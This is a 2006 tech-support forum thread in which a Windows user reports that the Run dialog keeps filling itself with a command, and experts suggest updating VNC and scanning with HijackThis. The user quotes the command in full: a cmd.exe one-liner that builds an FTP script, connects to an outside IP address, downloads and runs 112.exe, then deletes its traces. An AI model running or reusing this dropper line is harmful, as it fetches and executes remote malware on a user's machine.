Go Premium for a chance to win a PS4. Enter to Win

x
?
Solved

Run window being auto populated by someone/thing else

Posted on 2006-11-05
4
Medium Priority
?
278 Views
Last Modified: 2013-12-04
Hello

I have a question : at random intervals the run window from start>Run pops up and starts populating with text that tries to do something

This is the command line :

cmd.exe /c del i&echo open 81.208.83.216 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit

I downloaded these programs against  rootkit : Sophos anti rootkit, rootkit revealer and Novatix cyberhawk.
Sophos scan didnt find out anything, so did cyberhawk. I dont understand the rootkit revealer log.
I do use VNC viewer 4.1
I also have spyware doctor, spyware blaster, registry mechanic and AVG AV with firewall.
Help would be very appreciated
0
Comment
Question by:calvinnhobbes
  • 2
4 Comments
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 1500 total points
ID: 17877953
0
 
LVL 26

Expert Comment

by:DireOrbAnt
ID: 17878746
Yes, you need to update your VNC. However, you probably have some trojan on your computer already.
So run something like HijackThis:
http://www.spywareinfo.com/~merijn/programs.php#hijackthis

And remove anything suspicious. Do this after upgrading VNC.
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 17899000
What was the solution ultimately to your issue? Did kaspersky detect this, if so, what was the name it came up with? i think this info can help others that are having these issues.
Thanks!
-rich
0
 

Author Comment

by:calvinnhobbes
ID: 17899701
kaspersky didnt find anything, but i have done the upgrade from the free version to the professional version of VNC viewer and the  problem has gone. Hijackthis didnt find anything as well. I'm still afraid that the trojan or whatever is still in my system.
davide
0

Featured Post

When ransomware hits your clients, what do you do?

MSPs: Endpoint security isn’t enough to prevent ransomware.
As the impact and severity of crypto ransomware attacks has grown, Webroot has fought back, not just by building a next-gen endpoint solution capable of preventing ransomware attacks but also by being a thought leader.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Users of Windows 10 Professional can disable automatic reboots using the policy editor. This tool is not included in the Windows home edition. But don't worry! Follow the instructions below to install (a Win7) policy editor on your Windows 10 Home e…
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
Video by: ITPro.TV
In this episode Don builds upon the troubleshooting techniques by demonstrating how to properly monitor a vSphere deployment to detect problems before they occur. He begins the show using tools found within the vSphere suite as ends the show demonst…
Exchange organizations may use the Journaling Agent of the Transport Service to archive messages going through Exchange. However, if the Transport Service is integrated with some email content management application (such as an anti-spam), the admin…
Suggested Courses

885 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question